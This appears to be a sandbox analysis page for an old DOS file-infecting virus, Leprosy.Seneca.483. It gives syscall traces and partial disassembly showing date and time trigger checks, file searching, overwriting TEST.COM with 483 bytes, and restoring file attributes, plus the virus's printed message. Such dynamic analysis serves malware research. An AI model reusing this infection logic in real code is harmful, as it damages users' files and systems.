Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Seneca.483.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:43.995007732Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-17T22:51:43.998528639Z 42 PC: 12a7f | Get date 0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
2018-12-17T22:51:44.001491268Z 78 PC: 12a9b | Find first file
2018-12-17T22:51:44.008509819Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.014371844Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.017754245Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.028387208Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.034616406Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.038118951Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.042467274Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.049003278Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.051585694Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.054563839Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.059982806Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.062024906Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.065171829Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.07583011Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.078398136Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.081985245Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.08805887Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.090322969Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.103074267Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.109180202Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.111476368Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.115974781Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.123347669Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.125642303Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.129736182Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.135823496Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.138125257Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:44.156577994Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-17T22:51:44.16092406Z 87 PC: 12b4e | Get or set file date and time
2018-12-17T22:51:44.16306871Z 62 PC: 12b56 | Close file
2018-12-17T22:51:44.186150505Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T22:51:44.20313243Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.207129084Z 59 PC: 12aa6 | Change current directory
2018-12-17T22:51:44.212219981Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-17T22:51:44.21620721Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.218852481Z 2 PC: 12adb | Character output (Char = '0a')
2018-12-17T22:51:44.22340919Z 2 PC: 12adb | Character output (Char = '46')
2018-12-17T22:51:44.226525794Z 2 PC: 12adb | Character output (Char = '41')
2018-12-17T22:51:44.229007119Z 2 PC: 12adb | Character output (Char = '54')
2018-12-17T22:51:44.231478975Z 2 PC: 12adb | Character output (Char = '41')
2018-12-17T22:51:44.235719819Z 2 PC: 12adb | Character output (Char = '4c')
2018-12-17T22:51:44.2418331Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.24454518Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.248329517Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.251482662Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.254268002Z 2 PC: 12adb | Character output (Char = '4f')
2018-12-17T22:51:44.257745671Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.260837341Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.27853477Z 2 PC: 12adb | Character output (Char = '2d')
2018-12-17T22:51:44.282124855Z 2 PC: 12adb | Character output (Char = '2d')
2018-12-17T22:51:44.285161857Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.287621229Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.29053766Z 2 PC: 12adb | Character output (Char = '58')
2018-12-17T22:51:44.294272492Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.296817825Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.299485031Z 2 PC: 12adb | Character output (Char = '69')
2018-12-17T22:51:44.303018646Z 2 PC: 12adb | Character output (Char = '73')
2018-12-17T22:51:44.305701129Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.308355474Z 2 PC: 12adb | Character output (Char = '46')
2018-12-17T22:51:44.311860478Z 2 PC: 12adb | Character output (Char = '75')
2018-12-17T22:51:44.314842716Z 2 PC: 12adb | Character output (Char = '63')
2018-12-17T22:51:44.317448319Z 2 PC: 12adb | Character output (Char = '6b')
2018-12-17T22:51:44.320283811Z 2 PC: 12adb | Character output (Char = '65')
2018-12-17T22:51:44.323699519Z 2 PC: 12adb | Character output (Char = '64')
2018-12-17T22:51:44.326357951Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.328977619Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.332798067Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.335751391Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.338460978Z 2 PC: 12adb | Character output (Char = '0a')
2018-12-17T22:51:44.344304449Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.349364007Z 2 PC: 12adb | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":11,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.43267527Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.435748307Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.437825559Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.443633785Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.448452873Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.452555537Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.454801029Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.460045115Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.462049064Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.464386672Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.469126987Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.471060137Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.474269051Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.479295885Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.48430542Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.486772676Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.491539494Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.493376181Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.495739885Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.500579491Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.502465234Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.506905758Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.511727743Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.518412638Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.521121486Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.526286735Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.528859535Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.531381113Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.538358799Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.540214469Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.546930533Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.549858174Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.552837832Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.565958335Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.570537785Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.573315307Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.577172123Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":11,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.500015868Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.502583564Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.505130576Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.512766208Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.518893436Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.52079738Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.523480072Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.530303205Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.532021643Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.534721639Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.540504436Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.542012921Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.544881843Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.557986488Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.56093522Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.568586741Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.575439704Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.577198962Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.579996104Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.585728363Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.587417152Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.590207693Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.59576719Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.597576815Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.600545332Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.606098083Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.608170492Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.609975988Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.616983382Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.618824847Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.62658156Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.631302695Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.633093364Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.646584942Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.651670169Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.654819286Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.659363924Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.792113827Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.794588891Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.797098795Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.803023731Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.808769811Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.810730094Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.813311179Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.823377255Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.825518808Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.829422756Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.835671051Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.837142408Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.841638999Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.844981642Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.851236741Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.852934108Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.856574455Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.860387604Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.862112818Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.865209046Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.867476824Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.869622867Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.872775767Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.874811379Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.876985422Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.883045869Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.885123819Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.89147825Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.901445663Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.90688038Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.919296191Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.926464748Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.929087973Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.943444473Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.948212834Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.950674174Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.955763573Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-25T12:28:46.958292232Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-25T12:28:46.960727658Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.965437877Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.967827521Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.970796774Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.973979332Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.976448296Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.978908254Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.982175383Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.984887641Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.987309491Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.999085417Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.002228735Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.004372774Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.006998427Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.009225663Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.011886568Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.014525579Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.016703754Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.019251413Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.021911187Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.024356776Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.026462513Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.02897886Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.031963165Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.034076625Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.037161485Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.040654015Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.044351065Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.046424591Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.049005643Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.051238778Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.053397719Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.055944231Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.057877787Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.061327331Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.063890419Z 2 PC: 12adb | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:47.121257401Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:47.123882929Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:47.125782737Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:47.131457605Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:47.137576102Z 62 PC: 12b29 | Close file
2018-12-25T12:28:47.139141869Z 79 PC: 12aba | Find next file
2018-12-25T12:28:47.141424213Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.146679255Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.148011092Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.150217891Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.155435964Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.15896546Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.161383013Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.166682291Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.168021495Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.170330505Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.175196844Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.176528462Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.178885414Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.184029271Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.185334858Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.187721861Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.192573011Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.194262925Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.196680013Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.201585448Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.202834013Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.20447762Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.207895587Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.209640027Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:47.216095505Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:47.218805484Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:47.220385148Z 62 PC: 12b56 | Close file
